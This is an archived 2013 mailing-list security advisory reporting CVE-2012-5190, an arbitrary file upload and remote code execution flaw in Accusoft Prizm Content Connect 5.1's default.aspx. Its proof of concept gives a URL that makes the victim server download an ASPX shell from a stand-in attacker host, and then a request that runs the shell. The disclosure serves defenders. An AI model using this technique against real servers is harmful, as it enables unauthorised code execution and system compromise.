lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAAn0GCEwOxGx0zhTAX-TQ97f5RsT0dR66GBVuVtBrnYsZbfh6A@mail.gmail.com>
Date: Wed, 9 Jan 2013 16:49:38 -0500
From: Include Security Research <research@...ludesecurity.com>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Cc: cve-assign@...re.org
Subject: Arbitrary File Upload and Code Execution in
	Accusoft Prizm Content Connect

 In the course of our security assessment consulting we often find 0day
vulnerabilities and report them to vendors.  In this particular case the
vendor has unfortunately shown a general disgregard for the security risk
of this uncovered vulnerability which was originally disclosed privately to
them on September 27th 2012. All original deadlines and even their own
proposed fix dates have expired, as such we're releasing this advisory so
that affected customers can update their WAF/IDS/IPS systems to protect
themselves from this obvious vulnerability. We hope the Accusoft team
addresses this vulnerability in a patch or upcoming release as soon as
possible. This vulnerablity has been assigned CVE-2012-5190.

Take care,

Include Security Research Team

Arbitrary File Upload and Execution in Prizm Content Connect default.aspx

Prizm Content Connect web document viewer converts a variety of formats
into Adobe Flash objects so that they can be viewed in a web browser. If
Prizm Content Connect is configured according to the installation
instructions, it will be vulnerable to arbitrary remote code execution.

By default, the Prizm software includes a script called default.aspx which
will accept a document parameter that is a remote URL. This script will
download the remote document, save it to the server with an
attacker-supplied filename extension, and reveal the path to the document
on the local filesystem.

Since, in the default configuration, the download path on the local
filesystem resides within the web server’s web root, the attacker can cause
default.aspx to download a malicious ASPX script and save it with a
dangerous .aspx extension. The attacker can then request the ASPX script
from the server, causing the server to execute possibly malicious code
contained within.
Vulnerable versions

This vulnerability was discovered in the following version, but we
anticipate other versions to be vulnerable as well:

·         Prizm Content Connect 5.1
Proof of concept

First, the attacker causes the Prizm Content Connect software to download
the malicious ASPX file:

http://victim.example.com/default.aspx?document=http://attacker.example.org/aspxshell.aspx

The resulting page discloses the filename to which the ASPX file was
downloaded, e.g.:

Document Location: C:\Project\

Full Document Path: C:\Project\ajwyfw45itxwys45fgzomrmv.aspx

Temp Location: C:\tempcache\

The attacker then requests the ASPX shell from the root of the website:

http://victim.example.com/ajwyfw45itxwys45fgzomrmv.aspx

Assigned CVE#

CVE-2012-5190

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ